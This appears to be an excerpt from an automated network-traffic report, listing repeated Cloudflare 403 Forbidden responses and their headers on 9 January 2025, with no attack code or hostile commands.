Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:35:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:13 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZwgnFmpoFOSfQUbuaoqvYpmhOMpbrF2G%2BCGdqbD1ZQM40WJUMFxapLeU0kl9s2hKDGJjuA4LBNAVOySha3pneq3bK0TBwwRtvi6QOfk5h8aBojlMPXUerGSpCEAOx9YMNsZBGYZrVuNBA66P"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c0ec9a277d1e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1922&rtt_var=733&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1479229&cwnd=192&unsent_bytes=0&cid=aa819c7bf06b4d94&ts=152&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:35:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:13 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EQETytuiK5un4ORd6Fai09H8H2hyD7c6G38CseoMxMSVVEfV5h6W2oHautE93n7WWDPpiDeRibRJeinPdN2P3WeEqyuzLJcMrwrnenxvjQzhWOUgrRawTrHFuA1M1iReyFjCbndRjxO%2FFM9m"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c0f07d044370-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2371&min_rtt=2367&rtt_var=897&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1214137&cwnd=233&unsent_bytes=0&cid=dfe38ddfcddcbd8f&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:35:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:14 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zm37ewk%2FydhQGaM3xDekFSV6WASRKlSzJXusftoskLjlUeLz55o14lexjfYVh%2FgSol%2Fkj8YCzmQjtCLO0YDD7IqJcT6%2BKtTk1mfrmIGOEFbW2joFFtqdrmT8mdd3Icxm70se47iXCx%2Fqbb%2Bj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c0f44b6ade92-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1657&rtt_var=625&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1744324&cwnd=239&unsent_bytes=0&cid=29c4b35f806674d6&ts=145&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:15 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=El7bYXfhMSAc9VeeSLPXxwOaTUj3J3c8%2BwKpqWzV4req2MDqt0%2BF0zh5zH5moM6JQ9A4%2BblCpTkKzv6b2ImOR33z2Zk0hwWivZSmrECoI2Dy0uK7pbFNgKGohvDTGr3T3%2Fg1jSkJsgEg59kF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c0f88ca043f7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2100&min_rtt=2100&rtt_var=788&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1387173&cwnd=213&unsent_bytes=0&cid=8ade321fae307dec&ts=156&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:15 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O599fuIlAITKHRnEHF1yx%2BvR3CdA73jdVRr2VHsLB2GLxOSPNG9DDvLAwZszD5WTCUd5BMaE57cLdLsfrm%2FSPp%2FwTOJwfdL%2F6cAjgg7hJzYYDkqqnMbbrfsDMkEn0kdaN4o4MfoBFZK8qKD%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c0fe381b0f9f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1465&rtt_var=553&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1972972&cwnd=213&unsent_bytes=0&cid=36f4e4f3b5aaab81&ts=350&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:16 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fDqLVECS43crxJltnYqA%2B7dFZejAKCetqAaqGAPI%2FnJguI%2FYZmyvv%2FhSYmQLSzJQ6lSVEDBsNy3Q3HCZsM9mFzEKkhOKMqfEuXgr8iB2fVi1HMMVlE55xBj1e3m%2B0iLZPC29Z8kHpclUjlrq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1021a2443fe-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1594&rtt_var=615&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1753753&cwnd=236&unsent_bytes=0&cid=95e4ca477d63850e&ts=150&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:17 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxExzAR7w3rUFap0GylIo2jfIt8mFZeaNocEb%2FCLcTnHns0D42XJp0hzn%2BeMKkaLPfEIXDSuyTvYLugFiqKSdovexg2jwqRDK9CK4PVbjBGUEzHyltPhPAZr7rNKLBJ%2FNrMdo2kYrSJRJMiP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1060ebe6a5b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1699&rtt_var=646&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1718658&cwnd=209&unsent_bytes=0&cid=851b9595ba60d9bb&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:17 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62m9lEfrPBdYTGmx46QeKIs8hCGIzNNFKIZbLtACCIABL4JpkECcU3wDW1kHW3%2Fxlw6JiHtCYWZZDaagf5Gad2PnY%2BrDhniq6AUQ%2F9Rp9xhquHvuuEgDA3Me63dDKdoyGg050x4VOi3TXOQ6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c109f9171a3c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2006&rtt_var=762&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1427872&cwnd=229&unsent_bytes=0&cid=2f0f6ade932bd27a&ts=133&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:18 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LkJ9MESB8MZwyUO84EPBQI5dPq6qFit%2BisOD5bDbd0pKAr3zD%2FSNo5FRQyT8xTK3UT%2B%2BoOXjSUQ65B%2FZ8qbBgntCnZSGcpUaP5Xn5bgdLZpSSxez15MhLjOGJD4okt03zISePoxqyFnB7TeK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c10fa9a818b8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1672&rtt_var=668&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1589548&cwnd=186&unsent_bytes=0&cid=5b71f39299aa2fe8&ts=220&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:19 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oIVsx%2B4rvMCOxHunyfG9LjwWzL9OF02vjhceFqOETFwD0K6pqJpVISck5yGD25kSAWOFSBCQn3%2FlBWx9ffJNe3tnVX0w%2FdcpU1c2oRd0N9EhMMG1kugdPm%2FqZFDJOiDTVufC4Z6cV6xomri8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1139fed43a5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1588&rtt_var=608&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1780487&cwnd=252&unsent_bytes=0&cid=4beaa3495a0848a6&ts=136&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:20 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2FPzcRX2%2B35wNm%2B6ZQhiQdlrYOLdWs96HBbh3hQC1POlgS1YQnvRs46sK2YalkbOSYSLUiQcMN65%2FDH7LYS8u4UQ0suPul8hLw%2BAFbkLtjNywDLjV5FB8NzFzvEfsWuYnYwCZ3RCCz57izcx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1175ccff78d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1653&rtt_var=631&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1720683&cwnd=125&unsent_bytes=0&cid=9a03b50209bd50f7&ts=135&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:20 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dheu%2Bt%2B%2B%2FkHxiSxyI2uAkFt9iZYzNBzVvZ9hBTjkcDWgnatjpfaDHFNgCWPVhB%2FJuBVOuNwYc8HnKSIT9IotV5vivJQYCSa45eP5f%2FNu9RZgxyeSrndf0geswkKt9tKdD%2FXDWIfgVUKqMnmh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c11b2d8a42e7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1691&rtt_var=643&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1689814&cwnd=242&unsent_bytes=0&cid=26081c4dc488848f&ts=131&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:21 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZcpriirF%2B0xYBPEn3hSmSWkqlxUnZFMmiE8UA9dK1DC%2BF7oLK8nQzo3zYEvr6H66KPT%2FngbIWkI%2FfADXwObtHNDgIizses45L96QgOG2nV0MPzgJLv6Gm3TkVLDtmrBCjFZFcVNtrYr%2FkDX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c11f0fd64219-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1719&rtt_var=646&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1692753&cwnd=193&unsent_bytes=0&cid=b723378ce34248a9&ts=162&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:21 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1NeiHiS1AasbsnxUbnbOaIvGRylhum1XNZiv%2Bt8gvTi1yIcauR7CudNpBVLKpdC1ctRLQYD6y3URWfXxD4EaCFOXyaFYOEOdyi4CSSkLkWoFv%2FYfB81vdgK3oprW0QSvpmJJniBgVrzS5wd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1232d484346-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1575&rtt_var=604&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1790312&cwnd=252&unsent_bytes=0&cid=f53a0d8968928bd3&ts=175&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:22 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wvSTZxB1JVBFZgu0kPOGlz3dprBGnEvCb4hwraMVa4I3cQdUq6SUkyeEhfKk9QJMCKAfzaF79eE2fLqr3y2hmJ4PTpYrmRbJszfasvYR3zuiMfPdaUqds0MoWnopJAan9fzZTxBcpgiJfk7o"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c126fa7a43f3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2377&min_rtt=2376&rtt_var=894&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1222780&cwnd=213&unsent_bytes=0&cid=e1661285aab55ced&ts=140&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:23 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WN5VLDjgXfjnTw0n1%2FuiCU3Px1p0LPtAoEpcQheRZCACXod4kVS6A3w5mX5sfn2tk5y02jIfb5QHohJNms0w%2BMHcqK2P9ZZKSeQEx5ncAYtlgP5GezvWiXWDF8xulRSZZeOAQbL7YnqzAZNS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c12aba341921-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1678&rtt_var=635&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1713615&cwnd=139&unsent_bytes=0&cid=eda50b4132c06cf1&ts=145&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:23 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kcRH8vGoCnjUYJ0vEls4pBB2EcM%2BwV%2BF%2FLo52W24I8Vm4o5q4Pdoz5tVWorRJhtywlcuia3cFNF7Tu%2FxROrNsIGcCnvQdPLxOIDgg%2BGWtHxMyk3%2BNe2hAlTQU3zVUO9Qlj6XiZdiC97gEsw5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c12e7c4bc42c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1661&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1701631&cwnd=232&unsent_bytes=0&cid=10a02c7287ca6b0a&ts=130&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:24 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XIgPt25IgUST1ih%2BMZo2piXViKBtg1CUe9Donig%2BQ1IW8%2FZ9YU7HXTlYdklo6Ov80ImiUsIXY05JDyd6Nojk9XCiB%2BQP6HDw7dknY%2FtGlPwbpyJ%2BiIrANqv89VyEy4e1YbBjDKtL3KLUnY7e"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1326bcb8c41-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2036&min_rtt=1975&rtt_var=784&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1478481&cwnd=225&unsent_bytes=0&cid=1daa1e4d7e085201&ts=156&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:24 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IJHL2H0lo5BwbcYUkCuXKtnz5YPUIaRny2QVp2cCsr1qhkiJRMMxnxWHD239PyoBJwXti3FwmymRQQrIIVnqN%2FhmI8z8uT6ExVgJA8cbt11%2B4rCbutwfEqc5mzRivVWS9%2BQ7NwcOnR1uFhAs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1362fc58ce6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2005&rtt_var=764&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1420233&cwnd=162&unsent_bytes=0&cid=38c9b01a41d7afd4&ts=126&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:25 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jjdXrnUZtLohCFAZUrgGRzwxzAI4DdtNGidJLfkEOmzITh21Q2j%2BtiU%2F%2BDeIAVoEF7tKYQiGQxgqI1RYHxr%2FINZLjyl1PKXDrPEqBOqt%2F4g2E50K7pJmU6iyzuYBLUCJB9XwqMSoEXnzMgei"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c13a18464375-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1645&rtt_var=643&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1775075&cwnd=32&unsent_bytes=0&cid=d61daadfac522426&ts=151&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:26 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNyukV7NODgGTGhxN8pODZUXP7aYzTZ5iPFVILpuNTnV8r2swxnKHye5RQxzFhCrjV505GX1zA72SFkxkKIEzFug1WYnZLXnKmB6zH8GXZSe5UuZiXZTXL%2FDReITAujiGYWKfbCbQ4r0WvWo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c13dea6a43fb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1582&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1782661&cwnd=180&unsent_bytes=0&cid=7c40cab20d4d5267&ts=146&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:26 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=170npKSou8d8%2FaV4OgOPioOmt%2FLdrrxv82hmxrnZCTZAC066RDEYvqGsD9yjOjfRwCtwNfBbcBKZGlcijVivPvVnQae0ZiLrYhubsEEcWS9HU2%2BqrLght1WBJZZqrE2em3NNSMWFXBXIjdKn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c141ba62423f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1789&rtt_var=672&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1628555&cwnd=237&unsent_bytes=0&cid=d1822a64953d9022&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:27 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gFHhcWDtZkI4fyTdnMCG559JvEy0mxTAQ4Ydv%2BpLE67Vn4LMM7xQ5%2BzkAKAKhTzujPzxXz%2B2Cczf2%2B0GDxmCbYnArnqS2M%2BJFmDi4lHqdNaxR1c9dgV%2BTpzALusgI8EWxlyR%2FDC5dvy1eWzv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1456be8436c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2103&min_rtt=2093&rtt_var=805&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1343764&cwnd=228&unsent_bytes=0&cid=41998e57e3cef6fd&ts=135&x=0"
